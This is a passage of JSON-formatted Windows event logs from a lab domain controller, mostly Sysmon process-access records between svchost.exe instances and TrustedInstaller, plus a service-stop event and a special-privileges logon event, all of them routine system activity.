C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:09.334","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6158,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:09.334\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:09.334","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6159,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:09.334\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:09.334","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6160,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:09.334\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:09.334","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6161,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:09.334\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+10038|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:09.334","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+10038|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6162,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:09.334\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001014B90000}\r\nTargetProcessId: 1132\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x40\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\lsm.dll+b81f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:09.334","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001014B90000}","TargetProcessId":"1132","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x40","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\lsm.dll+b81f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4","EventReceivedTime":"2020-08-01 08:01:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76867,"ProcessID":856,"ThreadID":2808,"Channel":"System","Message":"The Windows Modules Installer service entered the stopped state.","param1":"Windows Modules Installer","param2":"stopped","EventReceivedTime":"2020-08-01 08:01:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6163,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:19.866\r\nSourceProcessGUID: {41C8662E-20D2-5F25-0000-00105D520800}\r\nSourceProcessId: 3592\r\nSourceThreadId: 2176\r\nSourceImage: C:\\Windows\\servicing\\TrustedInstaller.exe\r\nTargetProcessGUID: {41C8662E-20D2-5F25-0000-00101E540800}\r\nTargetProcessId: 4976\r\nTargetImage: C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe\r\nGrantedAccess: 0x100000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\System32\\combase.dll+669f8|C:\\Windows\\servicing\\TrustedInstaller.exe+43a2|C:\\Windows\\servicing\\TrustedInstaller.exe+1d1d|C:\\Windows\\servicing\\TrustedInstaller.exe+28c6|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:19.866","SourceProcessGUID":"{41C8662E-20D2-5F25-0000-00105D520800}","SourceProcessId":"3592","SourceThreadId":"2176","SourceImage":"C:\\Windows\\servicing\\TrustedInstaller.exe","TargetProcessGUID":"{41C8662E-20D2-5F25-0000-00101E540800}","TargetProcessId":"4976","TargetImage":"C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe","GrantedAccess":"0x100000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\System32\\combase.dll+669f8|C:\\Windows\\servicing\\TrustedInstaller.exe+43a2|C:\\Windows\\servicing\\TrustedInstaller.exe+1d1d|C:\\Windows\\servicing\\TrustedInstaller.exe+28c6|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6164,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:26.194\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010D1A90000}\r\nSourceProcessId: 1004\r\nSourceThreadId: 4244\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-00103ECD0000}\r\nTargetProcessId: 1304\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:26.194","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010D1A90000}","SourceProcessId":"1004","SourceThreadId":"4244","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-00103ECD0000}","TargetProcessId":"1304","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220679,"ProcessID":864,"ThreadID":3168,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x97EDC\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x97edc","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 08:01:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
